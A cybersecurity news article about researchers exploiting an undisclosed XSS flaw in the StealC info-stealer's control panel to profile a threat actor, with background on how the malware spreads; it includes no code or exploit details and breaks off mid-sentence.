Cyber: Security Bug In Stealc Malware Panel Let Researchers Spy On Threat...
Cybersecurity researchers have disclosed a cross-site scripting (XSS) vulnerability in the web-based control panel used by operators of the StealC information stealer, allowing them to gather crucial insights on one of the threat actors using the malware in their operations.
StealC is an information stealer that first emerged in January 2023 under a malware-as-a-service (MaaS) model, allowing potential customers to leverage YouTube as a primary mechanism – a phenomenon called the YouTube Ghost Network – to distribute the malicious program by disguising it as cracks for popular software.
Over the past year, the stealer has also been observed being propagated via rogue Blender Foundation files and a social engineering tactic known as FileFix. StealC, in the meantime, received updates of its own, offering Telegram bot integration for sending notifications, enhanced payload delivery, and a redesigned panel. The updated version was codenamed StealC V2.
The exact details of the XSS flaw in the panel have not been disclosed to prevent the developers from plugging the hole or enabling any other copycats from using the leaked panel to try to start their own stealer MaaS offerings.
It's suspected that these efforts have enabled the threat actor to seize control of legitimate YouTube accounts and use them to promote cracked software, creating a self-perpetuating propagation mechanism. There is also evidence highlighting the use of ClickFix-like fake CAPTCHA lures to distribute StealC, suggesting they aren't confined to infections through YouTube.
Further analysis has determined that the panel enables operators to create multiple users and differentiate between admin users and regular users. In the case of YouTubeTA, the panel has been found to feature only one admin user, who is said to be using an Apple M3 processor-based machine with English and Russian language settings.
In what can be described as an operational security blunder on the threat actor's part, their location was exposed around mid-July 2025 when the threat actor forgot to connect to the StealC panel through a virtual private network (VPN). This revealed their real IP address, which was associated with a Ukrainian provider called TRK Cable TV. The findings indicate that YouTubeTA is a lone-wolf actor operating from an Eastern European country where Russian is commonly spoken.
The research also underscores the impact of the MaaS ecosystem, which empowers threat actors to mount at scale within a
Source: The Hacker News
